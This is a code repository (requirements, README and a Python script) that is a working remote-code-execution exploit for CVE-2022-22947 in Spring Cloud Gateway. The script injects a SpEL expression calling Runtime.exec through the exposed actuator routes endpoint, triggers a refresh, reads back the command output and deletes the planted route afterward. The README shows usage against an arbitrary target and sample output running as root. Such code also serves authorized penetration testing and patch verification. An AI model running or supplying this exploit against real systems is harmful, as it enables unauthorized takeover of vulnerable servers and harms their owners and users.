├── requirements.txt ├── README.md └── exploit.py /requirements.txt: -------------------------------------------------------------------------------- 1 | certifi==2021.10.8 2 | charset-normalizer==2.0.12 3 | idna==3.3 4 | requests==2.27.1 5 | urllib3==1.26.8 6 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE) 2 | ###### CVE: CVE-2022-22947 3 | ###### CVSS: 10.0 (Vmware - https://tanzu.vmware.com/security/cve-2022-22947) 4 | ###### Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host. 5 | 6 | 7 | #### Usage 8 | ```sh 9 | git clone https://github.com/carlosevieira/CVE-2022-22947 10 | cd CVE-2022-22947 11 | pip3 install -r requirements.txt 12 | python3 exploit.py http://target 'id' 13 | ``` 14 | 15 | ```sh 16 | john@doe:~/exploit/CVE-2022-22947/$ python3 exploit.py http://localhost:8080 'id' 17 | 18 | ################################################### 19 | # # 20 | # Exploit for CVE-2022-22947 # 21 | # - Carlos Vieira (Crowsec) # 22 | # # 23 | # Usage: # 24 | # python3 exploit.py # 25 | # # 26 | # Example: # 27 | # python3 exploit.py http://localhost:8080 'id' # 28 | # # 29 | ################################################### 30 | 31 | [+] Stage deployed to /actuator/gateway/routes/rtxhovup 32 | [+] Executing command... 33 | [+] getting result... 34 | [+] Stage removed! 35 | uid=0(root) gid=0(root) groups=0(root) 36 | ``` 37 | 38 | #### References 39 | 40 | https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/ 41 | 42 | https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published 43 | 44 | https://tanzu.vmware.com/security/cve-2022-22947 -------------------------------------------------------------------------------- /exploit.py: -------------------------------------------------------------------------------- 1 | import random 2 | import string 3 | import requests 4 | import json 5 | import sys 6 | import urllib.parse 7 | import base64 8 | import urllib3 9 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 10 | 11 | headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'} 12 | 13 | id = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) 14 | 15 | def exploit(url, command): 16 | 17 | payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"} 18 | 19 | rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), verify=False) 20 | if(rbase.status_code == 201): 21 | print("[+] Stage deployed to /actuator/gateway/routes/"+id) 22 | print("[+] Executing command...") 23 | r = requests.post(url + '/actuator/gateway/refresh', headers=headers, verify=False) 24 | if(r.status_code == 200): 25 | print("[+] getting result...") 26 | r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False) 27 | if(r.status_code == 200): 28 | get_response = r.json() 29 | clean(url, id) 30 | return get_response['filters'][0].split("'")[1] 31 | else: 32 | print("[-] Error: Invalid response") 33 | clean(url, id) 34 | exit(1) 35 | else: 36 | clean(url, id) 37 | print("[-] Error executing command") 38 | else: 39 | print("[X] Error: Fail to deploy stage (Patched ?)") 40 | exit(1) 41 | 42 | def clean(url, id): 43 | remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False) 44 | if(remove.status_code == 200): 45 | print("[+] Stage removed!") 46 | else: 47 | print("[-] Error: Fail to remove stage") 48 | 49 | def banner(): 50 | print(""" 51 | ################################################### 52 | # # 53 | # Exploit for CVE-2022-22947 # 54 | # - Carlos Vieira (Crowsec) # 55 | # # 56 | # Usage: # 57 | # python3 exploit.py # 58 | # # 59 | # Example: # 60 | # python3 exploit.py http://localhost:8080 'id' # 61 | # # 62 | ################################################### 63 | """) 64 | 65 | def main(): 66 | banner() 67 | if len(sys.argv) != 3: 68 | print("[-] Error: Invalid arguments") 69 | print("[-] Usage: python3 exploit.py ") 70 | exit(1) 71 | else: 72 | url = sys.argv[1] 73 | command = sys.argv[2] 74 | print(exploit(url, command)) 75 | if __name__ == '__main__': 76 | main() --------------------------------------------------------------------------------